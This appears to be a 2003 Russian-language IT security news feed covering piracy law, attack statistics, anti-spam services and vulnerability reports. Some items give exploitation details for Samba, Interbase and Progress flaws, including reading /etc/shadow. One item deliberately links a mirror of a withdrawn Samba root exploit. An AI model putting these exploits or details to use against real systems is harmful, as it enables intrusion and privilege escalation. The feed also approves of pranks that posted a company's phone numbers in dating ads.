9 апреля президент РФ Владимир Путин подписал закон "О внесении изменения в статью 146 Уголовного кодекса Российской Федерации". Этот закон был одобрен Думой и Советом Федерации в марте, а теперь окончательно вступил в силу. Данный закон значительно ужесточает ответственность за нарушение авторских прав и, в частности, за музыкальное, видео- и компьютерное пиратство. Отныне пират, присвоивший себе авторство и нанесший крупный ущерб обладателю авторских прав, наказывается штрафом в размере от 200 до 400 МРОТ. Штраф также может выплачиваться в размере заработной платы за период от двух до четырех месяцев. Если ущерб велик, то к штрафу могут добавиться общественные работы сроком на 180-240 часов и тюремное заключение на срок до шести месяцев. Аналогичные санкции предусмотрены за незаконное использование объектов авторских или смежных прав и за любые действия, ставящие своей целью сбыт контрафактной продукции. В этом случае максимальный срок лишения свободы может составить до двух лет. За участие в организованной пиратской группе можно получить до пяти лет тюрьмы с конфискацией имущества, в зависимости от нанесенного ущерба. Преступления признаются совершенными в крупном размере, если стоимость экземпляров произведений или имущественных прав на использование объектов авторского права превышает 100 МРОТ, а в особо крупном размере - 500 МРОТ. Методика определения ущерба осталась прежней: во внимание принимается не розничная цена продукта, а стоимость носителя. Истчоник - http://www.compulenta.ru
10/04/2003 18:22 Хакеры работают по выходным.
2003 год обещает стать трудным для специалистов по сетевой безопасности и системных администраторов. Согласно отчету компании Internet Security Systems (ISS), специализирующейся на сетевой безопасности, в первом квартале 2003 года злоумышленники проявляли повышенную активность в интернете. Хакеры и создатели вирусов, не жалея себя, особенно усердно «трудились» по пятницам, субботам и воскресениям. В отчете Internet Risk Impact Summary Report (IRIS), подготовленном исследовательским подразделением ISS X-Force, говорится о том, что количество попыток вторжений и совершенных атак выросло на 36,6% по сравнению с аналогичным периодом прошлого года. Активность хакеров и вирусописателей выросла в 10 раз: увеличилось число сканирований компьютерных систем на предмет уязвимостей, по результатам которых появлялись новые вирусы. Если в последнем квартале прошлого года специалистами была зафиксирована «всего» 101 новая вредоносная программа, то в третьем квартале этого – уже 752. По данным X-Force, наибольшую активность злоумышленники проявляли по пятницам. 26% инцидентов было произошло в субботу и воскресение (в четвертом квартале 2002 года – 23%). По данным компании, именно в субботу, 25 января, в Сети появился вирус Slammer. Наибольшей популярностью пользовались два вида атак: подозрительная активность (73,5% от общего числа атак) и попытки неавторизованного вторжения (11%). При этом 35% атак было совершено в секторе розничной торговли, 11,5% в финансовом секторе, 9% в секторе здравоохранения, 9% в промышленном секторе и всего 1% на ресурсы федеральной и местной власти. В результате проведенного мониторинга база данных X-Force пополнилась описанием 606 новых уязвимостей. 156 из них относятся к числу критических, уровень опасности 341 «дыры» средний и 109 низкий. Источник - http://www.cnews.ru
10/04/2003 17:49 Подробности об Центре разговорного Английского.
Как было выяснено, господа, заваливающие своим спамом пол-рунета с предложением заняться изучением английского хостятся у провайдера Zenon (http://www.zenon.ru). Адрес почтовый, который отвечать должен за посылку спама из сети - abuse@zenon.net. В Зенон обещают разбераться с такими клиентами. Не стесняйтесь посылайте в Зенон Ваши жалобы (они просят вложить письмо со спамом ). Общими усилиями мы сделаем так что в России и зарубежем они хостится не смогут. Координаты получены с www.sysadmins.ru. Источник - http://dev/soul
10/04/2003 11:34 Sun введена новая технология разделения памяти.
Как указал некий Shalex с chat.portal.ru, фимой Sun представлена новая технология разделения памяти под названием Solaris Zones. Кодовое внутреннее название её - Kevlar. Суть технологии - держать приложения изолированными дру от друга. Что-то мне это напоминает в ОС Linux. Как написано - это позволяет запускать в одной области памяти разные ОС. Подробности - http://www.theregister.co.uk/content/4/30179.html
10/04/2003 10:59 Прекращена поддержка старых версия Red Hat.
Как стало известно, компания Red Hat прекратила с 31 марта поддержку 2-х своих дистрибутивов - 6.2 (Zoot) и 7.0 (Guinness). Версии 7.1 (Seawolf), 7.2 (Enigma), 7.3 (Valhalla) и 8.0 (Psyche) будут поддерживаться до 31 декабря этого года. Как ни странно, но на сервере написано, что версия 9.0 будет поддерживаться только до 30 апреля 2004 г. Последствия этого шага уже замечены на вышедшем вчера обновлении Samba - обновлены версии только с 7.0. Подробности - http://www.redhat.com/apps/support/errata/
10/04/2003 09:14 "Спамтест" - новое лекарство от спама.
На этой неделе компания "Ашманов и партнёры" запустила новый бесплатный сервис фильтрации спама Spamtest.Ru. Руководителем нового для Рунета проекта стал Алексей Тутубалин, известный также как автор проектов Russian Apache, "Чёрный квадрат" и Russian Internet Survey. В недавнем прошлом он являлся руководителем и главным разработчиком рейтинга Rambler`s Top100. Технология "Спамтест" предназначена для распознавания и фильтрации нежелательных массовых почтовых рассылок (спама) на основе анализа содержания писем. Сервис объединяет известные «формальные» методы с интеллектуальными методами контентной фильтрации, осуществляющими распознавание сообщений по их содержанию. В своей работе "Спамтест" использует четыре основных метода: автоматическая классификация текстов, сигнатура спамерских писем, формальные правила (признаки спама в заголовках письма) и "чёрные" списки адресов. Работа сервиса заключается в следующем: пользователь направляет на "Спамтест" свою почту с различных ящиков, например, с бесплатных почтовых сервисов. Далее "Спамтест" путем добавления в тему письма метки (Spam, Probable Spam, Travel, Seminars и др.) размечает почту, а затем отправляет ее на основной адрес пользователя. "А уж там фильтровать спамерские письма можно обычными формальными правилами почтовой программы. Например, правилами Microsoft Outlook, то есть раскладывать их по особым папкам или уничтожать", - говорит Игорь Ашманов, генеральный директор ЗАО "Ашманов и Партнёры". Подробности - http://www.webplanet.ru/news/company/2003/4/9/spamtest.html
09/04/2003 23:12 Ключ активации Windows 2003 Server просочился в интернет.
Система активации программного обеспечения, введенная корпорацией Microsoft в Office XP, а затем и в ОС Windows XP, не слишком помешала пиратам распространять эту систему. Во-первых, система активации достаточно скоро была взломана, а во-вторых, корпоративная версия ОС, поставлявшаяся в соответствии с лицензией Volume Licence, не требовала активации. Вместо сложного процесса анализа аппаратной части компьютера и генерации уникального ключа, пользователь мог применить при установке один из стандартных ключей Volume Licence Key (VLK). Эти ключи были опубликованы в интернете еще до начала официальных поставок Windows XP. Теперь точно такая же история повторяется и с новой серверной ОС Windows Server 2003. По сообщениям сразу нескольких сайтов, посвященных новостям программного обеспечения, ключи VLK для новой версии Windows уже можно найти в интернете. Новая серверная ОС Microsoft имеет ту же систему активации, что и Windows XP. Однако на практике с активацией столкнутся меньшинство пользователей этой ОС. Основная масса копий будут поставляться именно на условиях Volume Licence, с использованием для активации VLK-ключей. Скорее всего, Microsoft изменит систему активации Windows Server 2003 Volume Licence в одном из обновлений к этой ОС. Подробности - http://www.neowin.net/comments.php?id=10087&category=main
09/04/2003 22:30 Хакеры из бывшего СССР взломали компьютеры американской больницы.
ФБР вышло на след хакера, взломавшего компьютеры небольшой клинике в городке Или в штате Невада. Эта больница насчитывает всего сорок мест, однако имеет выход в интернет и поэтому испытывает все связанные с этим проблемы. Взломщики не похитили данные о пациентах, однако могли узнать кое-что о работниках больницы: информация о номерах социального страхования и банковских счетах вполне могла пострадать, полагают в ФБР. Однако самый примечательный момент во взломе сельской больницы заключается в другом. Дело в том, что по информации ФБР, за взломом стоят хакеры из бывшего СССР. Они пытались скрыть свою истинную сущность, проведя атаку через серверы арабского телеканала "Аль-Джазира". Однако в ФБР раскусили обманщиков и сумели выйти на след хакеров. В местной прессе появились сообщения о том, что к взлому причастна русская мафия. Атаку обнаружил один из системных администраторов больницы Джим Кросли. По его словам, в злополучный день он обнаружил неожиданно активное соединение с компьютерами больницы извне. При этом неизвестные пытались соединиться с компьютером бухгалтерии клиники. Кросли, заподозрив, что в компьютер проникли хакеры, быстро отключил компьютер от сети. Как удалось выяснить агентам ФБР, в установленной на компьютере игре Blaster Ball содержался троян, который и привел туда хакеров. Источник - http://www.compulenta.ru
9/04/2003 22:12 17 апреля - День Борьбы Со Спамом. Или Крестовый поход против American Language Center!
Все люди на земле, пользующиеся интернетом, имеют одну общую черту. Все они ненавидят спам. Если у вас есть электронный адрес, наверняка вы как минимум несколько раз в неделю, а как максимум много раз в день в своем почтовом ящике обнаруживаете непрошеные сообщения. В России же всё намного проще. Существует одно главное зло, перед которым блекнут все остальные спамеры. Конечно же, вы уже знаете о чем я . Да, о нем, о Центре Американского английского. Воистину сложно найти в нашей стране пользователя, который ни разу бы не получал на свои ящики рекламы от American Language Center. Уверены, некоторые из вас получают спам от них даже несколько десятков раз в день. Что остается нам, бедным пользователям, как нам бороться с этим злом? До настоящего момента наши усилия были разрозненными и не приносили ощутимых результатов. Конечно же, вы не раз звонили по телефонам - 238-33-86, 778-9894, 411-0232 и сначала вежливо, а потом и не очень, просили девушку исключить вас из списка их рассылки. Вы ставили фильтры, вы даже позволили себе нецензурную брань в адрес Кости Сапрыкина, предлагающего выучить великий и могучий американский язык. Некоторые из вас даже размещали на сайте знакомств объявления, вписав под фотографией соблазнительной красотки телефоны American Language Center. Теперь наши усилия могут стать объединенными. В русском журнале придумали способ борьбы с этим наваждением. Иннокентий Жеглов предлагает устроить акцию под кодовым названием Методы против Кости Сапрыкина. 17 апреля, следующий четверг объявляется Днем Борьбы Со Спамом. Точнее со спамом в лице Центра Американского Английского. Что нужно делать в этом день? Автор РЖ предлагает всем пострадавшим от Центра и прочим сознательным гражданам звонить по телефонам 238-33-86, 778-9894, 411-0232 и, подробно расспросив девушку на телефоне о всех предоставляемых Центром услугах, записываться на курсы Американского английского. Всё законно. Никакого хулиганства. Однако, возможно, кое-кто призадумается об эффективности методов собственной рекламы. Автор РЖ обещает держать нас в курсе масштабов и итогов запланированной акции, хотя и не исключает того, что первый тур может и не дать ожидаемых результатов. А результаты ожидаются следующие: подвести рассадников американского английского к мысли, что их действия не есть хорошо, и что за это нужно как минимум просить прощенья. Иначе говоря, от центра ждут извинений в стиле "Prostite nas, my bol'she ne budem!", после чего ожидается добиться полного прекращения рассылки надоевшего спама. Поддержим акцию "Лабораторию Касперского"! Все выше приведенное взято со слов Анны Григорьевой. Источник - http://www.viruslist.ru
9/04/2003 21:55 Фирма извиняется за обнародование эксплойта для Samba.
Секьюрити-фирма принесла свои извинения за преждевременную публикацию кода, необходимого для использования серьезной уязвимости ПО Samba — программы с открытым исходным кодом, предназначенной для обмена файлами между системами под Unix и Linux. В понедельник команда разработчиков Samba обрушилась с критикой на компанию Digital Defense, которая приложила код к своей рекомендации по преодолению уязвимости. Этот код позволяет любому злоумышленнику получить полный контроль над системой на базе Samba. Команда Samba была в ярости. После напряженных переговоров Digital Defense опубликовала извинения за то, что допустила оплошность. Она утверждает, что руководство не знало о намерении сотрудников компании обнародовать эксплойт. «Код вышел без разрешения руководства Digital Defense и содержит эксплойт, внешнее распространение которого не было санкционировано, — говорится в извинении. — В Digital Defense приняты решительные меры к уменьшению вероятности повторения аналогичных случаев в будущем». В качестве мальчика для битья предстал Эрик Паркер, один из сотрудников, ответственных за публикацию кода. «Мы выступили с предложением, но руководство компании не санкционировало выпуск эксплойта. Это сделали самовольно двое аналитиков, и я в их числе, — заявил он. — С самого начала и до момента выпуска рекомендаций процесс шел гладко, но публикация возмутила команду Samba, и это понятно». Но МЫ никоим образом не связаны с проектом САМБА, а посему выкладываем вам ссылку на эксплоит, убранный Digital Defence. Огромное спасибо человеку, успевшему скачать этот экплоит и давшем ссылку на него на linux.org.ru. Эксплоит - http://make-install.ifirst.ru/misc/trans2root.pl
9/04/2003 11:59 Спамеры спешат нажиться на войне в Ираке.
Каждое десятое письмо с назойливой рекламой - спамом - в марте, прямо или косвенно относилось к войне в Ираке, - утверждает компания SurfControl, разрабатывающая cистемы отсева электронной корреспонденции.ольшая часть спама на военную тему появилась в середине марта. Под кричащими заголовками типа "Угроза терроризма, пожалуйста прочтите!" скрывались многочисленные предложения о покупке противогазов, фильтров для воды и других средств индивидуальной защиты. Не обошлось и без использования темы патриотизма - с помощью спама производители флагов и различной атрибутики пытались продать свои изделия тем, кто поддерживает войну. Источник - http://www.cnew.ru
9/04/2003 10:04 VeriSign и nCipher представляют Hardware SSL.
Как сообщает bugtraq.ru, вчера небезызвестная компания VeriSign вместе с nCipher представили расширение SSL-протокола. Суть инновации состоит в том, что SSL-ключ будет защищен hardware-модулем, зашифрованным по FIPS 140-2 стандарту. По заверениям разработчиков, это обеспечит максимальную безопасность передачи информации между сервером и клиентом и позволит компаниям показать наивысший уровень безопасности интернет-транзакций. Подробности - https://www.ectaportal.com/uploads/1997ncipherVersignportal.doc
8/04/2003 15:14 Cайт, посвящённый описанию ipfw.
Украинский сайт, посвящённый описанию работы и настройки ipfw - IP-firewall и программа для управления формирования трафика в сети для OC FreeBSD, обнаружен в Интернете. Описываются базовые команды ipfw, принципы формирования правил, dummynet (гибкий администратор (регулировщик) ширины полосы пропускания). В третьей главе приведены рабочие примеры. К сожалению на титульной странице ребята что-то намудрили с кодировками, поэтому вылазит нечитабельный текст (проверено в броузерах Mozilla & IE). Но если покликать на пункты 1, 2, 3 - то текст внутри вполне читается. Сайт - http://ipfw.ism.kiev.ua/index.html
8/04/2003 13:12 Число security-инцидентов подскочило на 80%.
В первом квартале 2003 года заметно выросло количество происшествий, связанных с нарушением безопасности, — начиная с мелких покушений на проникновение в сеть и кончая серьезными атаками. По сравнению с предыдущим трехмесячным периодом это число подскочило почти на 84%, утверждается в отчете компании Internet Security Systems. Максимальный вклад в этот рост внесли черви и ПО для автоматических атак. «Резкое увеличение массовой почтовой рассылки, высокая активность червей и частота атак указывают на то, что этот год будет трудным для администраторов и руководителей служб безопасности во всем мире», — пишет во вступлении к отчету директор отдела исследований и разработок ISS Крис Роуланд. ISS наблюдает за происшествиями посредством датчиков, установленных примерно у 400 клиентов компании во всем мире. С 1 января по 31 марта были зафиксированы атаки, которые многие считают первым флэш-червем, — он атакует автоматически и распространяется так быстро, что датчики не успевают отреагировать. Этот червь, получивший название SQL Slammer, заразил 200 тыс. компьютеров с Microsoft SQL Server, на которых не была установлена выпущенная полгода назад поправка. 90% всех уязвимых компьютеров эпидемия охватила за первые же десять минут. Из отчета следует, что на выходные приходится всего 26% всех происшествий, а день максимальной активности злоумышленников — пятница, на которую в среднем приходится 2,3 млн происшествий, относящихся к «аномальной деятельности». Подробности - http://www.zdnet.ru/?ID=298812
8/04/2003 12:51 Программа для анализа логов прокси-серверов.
Обнаружена довольно любопытная программа, задача которой - облегчить жизнь администратору сервера, выполняющего роль прокси (посредника) путём построения диаграмм загруженности сервера и других данных, помогающих анализировать файлы регистрации. Называется Internet Access Monitor. Помогает легко и просто преобразовать большое количество лог-файлов прокси-сервера в компактную и удобную базу данных, позволяющую получать большое количество различной информации. Программа умеет генерировать более 10 видов отчетов, предоставляющих возможность получить полное представление о рациональности использования Интернет-канала, фильтровать информацию в соответствие с различными параметрами отбора, а также строить красивые цветные диаграммы. Разработан и поддерживается RedLine Software. Предназначена для платформы Windows. Поддерживает следующие прокси: WinGate, WinRoute, MS ISA Server, MS Proxy Server, WinProxy, Squid, Proxy Plus. Для получения ключа требуется бесплатная регистрация. Cайт проекта - http://www.internetaccessmonitor.ru
8/04/2003 10:47 Уязвимость в SAMBA.
Digital Defense Inc. наконец-то опубликовала подробности уязвимости в реализациях SAMBA - ПО для обеспечения взаимедойствия с машинами под управлением Windows с использованием протокола SMB/CIFS. Ранее команда разработчиков пакета Samba анонсировала выпуск новой версии своего ПО, написав, что описание будет опубликовано 7 апреля, что и было сделано. Уязвимость также присутствует в родственном проекте под названием Samba-TNG. Уязвимость присутствует в сивольном массиве fname функции StrnCpy(), в которой не определена граница константы namelen (252 строка исходника smbd/trans2.c). В свою очередь переменная namelen задаётся значением strlen(pname)+1. При задании pname больше 1024 байта можно переполнить буфер и выполнить произвольный код в пространстве памяти процесса. Используя уязвимость, удалённый анонимный злоумышленник может получить полномочия суперпользователя. Выпущен эксплоит на Перле - trans2root.pl, а также сканер nmbping.pl, использующий UDP для проверки наличия уязвимости. Дыра обнаружена в версиях Samba < 2.2.8a и Samba-TNG < 0.3.2 в ОС: Redhat Linux 7.1, 7.3, 8.0, Gentoo Linux 1.4-rc3, SuSe Linux 7.3, FreeBSD 4.6, 4.8, 5.0, Solaris 9. Для версий ветви 2.0.х рекомендуется применить патч, выложенный на сайте производителя. Описание - http://www.digitaldefense.net/labs/advisories/DDI-1013.txt Эксплоит и сканер - http://www.digitaldefense.net/labs/securitytools.html
8/04/2003 09:44 Выпущен инструментарий для OpenOffice.
Как сообщается на linux.org.ru, группа OpenOffice.org анонсировала выход комплекта средств разработки (SDK), который позволит программистам создавать новые модули, расширяющие возможности открытого офисного пакета OpenOffice.org. Подробности - http://www.itc.ua/article.phtml?ID=13093&ch=1
8/04/2003 09:07 Dr.Web защищает ящики Mail.Ru.
Почтовая служба Mail.Ru объявила о том, что отныне вся входящая почта ее пользователей проверяется на наличие вирусов программой Dr.Web. Соответствующее соглашение было подписано между компанией Mail.Ru и ЗАО "ДиалогНаука". Ежедневно антивирус Dr.Web осуществляет проверку более 5 миллионов писем, проходящих через сервера Мail.Ru, причем порой количество проверяемых писем достигает 250 тысяч в час. По данным компании, с момента начала экспериментального использования Dr.Web на Мail.Ru уровень присутствия червей семейства Klez в российском сегменте Сети сократился в 5 раз. Источник - http://www.mail.ru
7/04/2003 13:46 Дыры в клиентской программе SETI@Home.
Проект SETI@Home объявил о выпуске новой версии клиентской программы для одноименной сети распределенных вычислений. Напомним, что целью SETI@Home является расшифровка радиосигналов, приходящих из космоса с целью поиска в них искусственных составляющих. Обнаружение искусственных сигналов из космоса свидетельствовало бы о том, что человечество не одиноко во вселенной. Причиной для выпуска нового клиента с номером версии 3.08 стало обнаружение во всех старых версиях клиента для всех без исключения платформ нескольких опасных дыр. Самая серьезная из дыр связана с возникновением ошибки переполнения буфера при обработке чересчур длинных запросов. Используя эту ошибку, хакер может заставить клиент соединиться с произвольным сервером и выполнить на пораженном компьютере произвольный код. Подобная уязвимость имелась и на сервере SETI@Home, однако каковы могли быть последствия ее использования, не сообщается. Наконец, еще одним неприятным моментом является то, что вся информация внутри сети распространяется в обычном текстовом формате. Таким образом распространяются и данные о конфигурации компьютера пользователей и установленных на них ОС. Перехватить эту информацию совсем просто. Подробности - http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home
7/04/2003 12:13 Cтатья "MySQL для пользователя".
Благодаря всё тому же Руслану иванову, ака Rend с форума RTFM (www.sysadmins.ru) обнаружена интересная статья Дениса Колисниченко "MySQL для пользователя", которая была опубликована 27 марта в журнале "Софтерра" в рубрике LINUXОИД. Как следует из названия, посвящена она не администрированию и настройке СУБД MySQL, а работе пользователя с этой СУБД. В частности, на примерах автор рассматривает создание таблицы, формирование SQL (Structured Query Language, Структурированный язык запросов) - запросов, работу с различными командами SQL. Думается, подобное описание будет интересно пользователям, начинающим работу с MySQL. Cтатья - http://www.softerra.ru/freeos/25374/
7/04/2003 12:02 Австралия ужесточает наказание за веб-контент.
Лица, загружающие или передающие через интернет детскую порнографию, могут быть признаны уголовными преступниками и приговорены к тюремному заключению сроком до 10 лет, говорится в новом законопроекте, представленном в парламент Австралии сенатором и министром юстиции и таможни Крисом Эллисоном (Chris Ellison). В случае принятия, этот закон уравняет электронные изображения такого рода с полиграфическими или записанными на магнитные и оптические носители. Полиция и раньше боролась со случаями распространения этих материалов в Сети, но наказание определялось в зависимости от региональных законов. Кроме детской порнографии, сенатор обратил внимание на необходимость бороться с сайтами, посвященными самоубийствам. По его словам, в Сети насчитывается более 100 тысяч сайтов про суицид, где желающий расстаться с жизнью сможет выбрать наиболее подходящий из сотен способов. По новому закону, если его примут, электронная пропаганда самоубийств обойдется веб-мастеру штрафом в $110 тыс. По закону Customs Act, импортирование или экспорт документов такого рода в реальном мире ведет к наложению такого же штрафа. Источник - http://www.cnews.ru
7/04/2003 11:37 Уязвимость в СУБД Interbase.
Похоже, ребята из Secure Network Operations Inc. всерьёз взялись за изучение безопасности СУБД. Второй пострадала СУБД Interbase, выпускаемая известной всем программерам фирмой Borland. Была обнаружена возможность переполнения буфера в переменной среды ISC_LOCK_ENV, проверяемой компонентой СУБД gds_lock_mgr. При задании этой переменной длины более 1024 символов происходит переполнение буфера с дальнейшей возможностью получения прав суперпользователя (локально, разумеется). Уязвимость скрыта в функции strcat() файла gds.c. Для устранения уязвимости рекомендуется вместо неё применять функцию strncat(), или применить команду chmod -s /path/to/gds_lock_mgr. Borland на сообщение об уязвимости не прореагировала. Подробности - http://www.secnetops.biz/research
7/04/2003 11:06 Уязвимость в СУБД Progress.
Secure Network Operations,Inc. обнаружена уязвимость в СУБД Progress (производитель www.progress.com), которая позволяет локальному пользователю получать доступ к файлам, доступ на которые имеет только суперпользователь. Происходит это из-за того, что СУБД читает конфигурационные файлы от имени суперпользователя. Таким образом, установив, например, переменную PROSTARTUP таки образом, чтобы она указывала на важный системный файл (/etc/shadow, например), локальный пользователь при запуске СУБД из анализа сообщений об ошибках может узнать часть содержимого этого файла. Уязвимость присутствует в ОС: Linux, SunOS, SCO, TRU64, *nix. В качестве метода защиты необходимо примениь операцию chmod -s для директории $DLC. Подробности - http://www.secnetops.biz/research
7/04/2003 10:39 Cегодня ожидается выход SuSE 8.2.
Как сообщается на сайте suse.de в понедельник, то есть сегодня, ожидается выход нового релиза популярного дистрибутива Linux - SuSE 8.2. Из новшеств можно отметить следующие. Улучшен (и упрощён) процесс инсталляции, добавлена возможность использования различных источников при инсталляции отдельных пакетов. Online update возможен до первого входа (логина) в систему. Обновлена помощь в Yast и Yast Online update. В систему введён SuSEwatcher, предназначенный для автоматической проверки обновлений. В состав дистрибутива включены: ядро 2.4.20, XFree86 4.3, KDE 3.1, Gnome 2.2, Desktop Sharing Framework, OpenOffice 1.0.2, KOrganizer совместимый с Exchange 2000, GCC 3.3 prerelease, Sun Java 1.4.1, Kioskfunktions in KDE 3.1 (ограничение прав админов и организация их аккаунтов, теперь root != god) и т.д. Подробности - http://suse.de/en/private/products/suse_linux/i386/new_features.html
7/04/2003 10:07 Cтатья "Security Administration with Debian GNU/Linux".
На сайте Linux Gazette опубликована статья Jose Salvador Gonzalez Rivera, посвящённая администрированию Debian GNU/Linux в части безопасности системы. В статье рассмотрены вопросы анализа уязвимости (на примере nessus), применения разрешений и аттрибутов файлов и директорий, применения квот и лимитов пользователей, исследования активности пользователей, анализа файлов регистрации. Статья - http://www.linuxgazette.com/issue89/gonzales.html
7/04/2003 09:04 Выход OpenBSD 3.3 в CVS.
Как сообщает SHuRuP из nixp.ru, новая версия операционной системы OpenBSD, 3.3, уже появилась в репозитории CVS. Так что все желающие установить стабильную систему получили возможность сделать это уже сейчас. Для этого необходимо набрать следующие команды в консоли: cd /usr cvs ; checkout -P -rOPENBSD_3_3_BASE src. Изменения - http://www.openbsd.org/plus33.html
6/04/2003 16:24 Статья "Сниффинг сети на коммутаторах".
На Екатеринбергском сайте www.nag.ru, посвящённому Ethernet-провайдингу опубликован обзор #5 (#132) от 5.04 под названием "Сниффинг сети на коммутаторах". Как известно, сниффинг (прослушивание) локальной сети является головной болью администраторов. В качестве меры противодействия обычно применяют шифрование траффика и использование коммутаторов, которые не позволяют прослушивать весь локальный сегмент, поскольку производят соединение непосредственно между участниками сетевого соединения. Однако, с помощью одних лишь коммутаторов решить проблему сниффинга не удается на все 100%. Сниффинг в локальных сетях, построенных на коммутаторах, возможен! Любой, имея ноутбук и соответствующее программное обеспечение, может, подключившись к свободному порту коммутатора, перехватывать пакеты передаваемые от одного компьютера к другому. В самой статье как раз и рассматриваются различные утилиты, применяемые хакерами для прослушивания как коммутируемых сеей, так и сетей, построенных на хабах. Рассматриваются также методы и программы для обнаружения снифферов и программы, обеспечивающие более серьёзную защиту. Статья, вне всякого сомнения, будет очень интересна как системным администраторам, так и специалистам по компьютерной безопасности. Статья - http://www.nag.ru/2003/0405/0405.shtml
6/04/2003 14:44 Эксплоит xlock.
Опбуликован локальный эксплоит утилиты xlock из XFree 4.2.0 в ОС RedHat 7.2, уязвимость которой заключается в возможности переполнения XLOCALEDIR. Автор - omega из команды S.T.A.R. Вывод: Если не обновили систему - снимите флажок SUID с утилиты xlock. ;) Исходник - http://packetstorm.linuxsecurity.com/0304-exploits/xlock-XLOCALEDIR.c
6/04/2003 13:41 Ошибка реализации системных вызовов во многих UNIX-ОС.
Andrew Griffiths из Австралии сообщает об "особенности" в реализации системных вызовов во многих UNIX операционных системах, используя которую локальный злоумышленник может на основании времени отклика системы на запрос определённого файла установить - существует ли он в системе. В частности, как утверждает автор, подобным образом можно вычислить существование при использовании системных вызовов open(), stat(), mkdir(), chdir() и др. Определить существование файлов можно даже в той директорию, на которую не имеет прав локальный пользователь. ПОдобная уязвимость может быть использована для расширения масштаба атак на основании предположения о существовании файла. Автором выпущен эксплоит с названием filetest.c, в котором для проверки существования файла используется системный вызов open(). Были проверены ОС: RedHat kernel 2.4.18-26.7.x/2.4.18-27.7.x, Debian 3.0, FreeBSD 4.4. Подробности - http://www.securityfocus.com/archive/1/317425
6/04/2003 13:17 Яndex вышел на "зачистку".
"Яндексу" надоел спам. Смертельно. Теперь ему объявлена война не на жизнь, а насмерть. Уже давно пользователи Сети стонут от этого бедствия. Еще год назад Эрик Эллман, стоявший у истоков создания электронной почты, в одном из интервью заявил, что спам - это страшное зло. И вот, как уже было сказано выше, "Яндекс" начал войну. Более того, он объявляет задачу доставки чистой почты своим приоритетом. Теперь письма, присланные пользователям портала, будут проходить три уровня фильтрации. Сначала вычистят явный спам - сообщения, приходящие от взломанных и открытых почтовых серверов. Также полетят в "корзину", те сообщения, что не избежали спамовых ловушек. После этой процедуры каждое письмо проверят антивирусной программой DrWeb. При этом зараженные письма, не содержащие ничего, кроме самого вируса, отбрасываются, а зараженные письма с текстом помечаются "осторожно, вирус". И, наконец, последним срабатывает фильтр, помещающий в папку "Рассылки" подозрительно похожие письма, разосланные по слишком большому списку адресов. Если быть точными, то "великая чистка" началась еще вчера. Сводки с "фронта" публикуются на специальной страничке. Так, за один день отсеяно более 60% писем. В них был, как понимаете, спам. Источник - http://www.utro.ru/
6/04/2003 12:38 Хакеры "убили" Билла Гейтса.
Сеульская фондовая биржа пережила сильное потрясение в связи с электронной "уткой" о смерти основателя компании Microsoft Билла Гейтса. Дезинформация исходила от хакеров, которые примерно неделю назад смогли ненадолго поместить сообщение о гибели "компьютерного гиганта" на новостной сайт CNN. Доверяя авторитету известного источника, "новость" распространили китайские СМИ, а уже оттуда "утка" попала в эфир южнокорейских телеканалов. Сразу после сообщения о смерти Гейтса индекс Сеульской фондовой биржи упал на 1,5%. К счастью, уже через четверть часа телеканалы извинились за свою ошибку, биржевые деятели облегченно выдохнули и индекс восстановился. Только в одном хакеры ошиблись: рядом с фотографией Гейтса было написано, что он ушел от нас в возрасте 55 лет, что не соответствует действительности (Билл родился в 1955 г.), однако поначалу и это несоответствие ускользнуло от взгляда доверчивых зрителей CNN. По версии хакеров, Билл Гейтс был убит киллером на благотворительном приеме в Лос-Анджелесе. Источник - http://www.utro.ru/
6/04/2003 11:52 Компьютерные вирусы обошлись Японии в 3,5 млрд. долларов.
Компьютерные вирусы нанесли Японии ущерб объемом 440 млрд иен (около 3,5 млрд долларов). Таковы опубликованные министерством экономики и промышленности данные за минувший финансовый год, который закончился 31 марта. По словам специалистов, сумма убытков достигла почти одного процента от валового внутреннего продукта второй экономической державы планеты, составившего годом ранее 502 трлн иен (более 4 трлн долларов). Сообщается, что вычисления производились по новому методу на основе данных, полученных от примерно тысячи японских компаний. Источник - http://www.itar-tass.ru
6/04/2003 11:31 StarForce расширил защиту PDF от копирования.
Компания Protection Technology, разработчик технологий защиты от копирования, сообщила о выходе обновленной системы защиты от копирования StarForce PDF 1.1. StarForce PDF 1.1. является последней версией системы защиты текстового и графического содержания от нелегального использования, и исключает возможность несанкционированного открытия и просмотра защищенных документов в PDF (Portable Document Format) формате при помощи продуктов Adobe и других программ. Продукт адресован в первую очередь авторам и издателям электронных книг, энциклопедий, журналов, учебных пособий, лекций, научных и статистических отчетов, корпоративных изданий, а также прочих текстовых и графических документов, нуждающихся в защите от нелегального распространения и использования. Компания представляет две разновидности системы StarForce PDF 1.0 в зависимости от оптического носителя, на котором распространяются PDF документы: CD-ROM/ DVD-ROM и CD-R. Версия DVD-R находится на стадии разработки. Источник - http://www.cnews.ru
6/04/2003 10:17 Испанская полиция задержала автора вируса, поразившего 100 тысяч компьютеров.
Уголовная полиция Испании задержала в провинции Валенсия автора и распространителя компьютерного вируса Cabronator (другое название - Cabrotor), поразившего, по приблизительным оценкам, около 100 тысяч компьютеров. Операция по розыску и задержанию вирусописателя называлась "Клон" и началась еще в августе прошлого года. Автор вируса привлек внимание правоохранительных органов после того, как в Интернете был обнаружен необычный сайт. На указанном сайте помимо собственно троянской вирусной программы были размещены инструкции по ее использованию. Установив местонахождение компьютера, с которого вирус начал свое широкое распространение, полицейские сумели обнаружить и автора вредоносной программы, позволявшей получать несанкционированный доступ к сведениям других пользователей. Преступником оказался 27-летний программист. Полицейские сообщили, что следствие по делу о вирусе пока не закончено, и, вполне возможно, появятся сообщения о новых арестах. Источник - http://www.lenta.ru/
5/04/2003 18:42 Статья "IP-телефония: угрозы, атаки и способы их отражения".
В журнале "Мир связи. Connect!" (№8, 2002 г.) была опубликована статья известного российского специалиста по компьютерной безопасности, заместителя директора по маркетингу ЗАО НИП "Информзащита" А.В.Лукацкого "IP-телефония: угрозы, атаки и способы их отражения". ИT-специалистам, включая и специалистов по защите информации, крайне желательно знать потенциальные угрозы компонентам инфраструктуры IP-телефонии и способы защиты от них, включая и возможности VoIP-стандартов с точки зрения информационной безопасности. Именно это позволило бы так организовать работу корпоративной системы IP-телефонии, чтобы она не стала еще одним источником опасности для бизнеса компании. О различных аспектах безопасности VoIP И рассказывается в этой статье. Статья - http://www.sysadmins.ru/rtfm/security/iptel/iptel.html
5/04/2003 15:33 Биометрическая система контроля и управления доступом от BioLink.
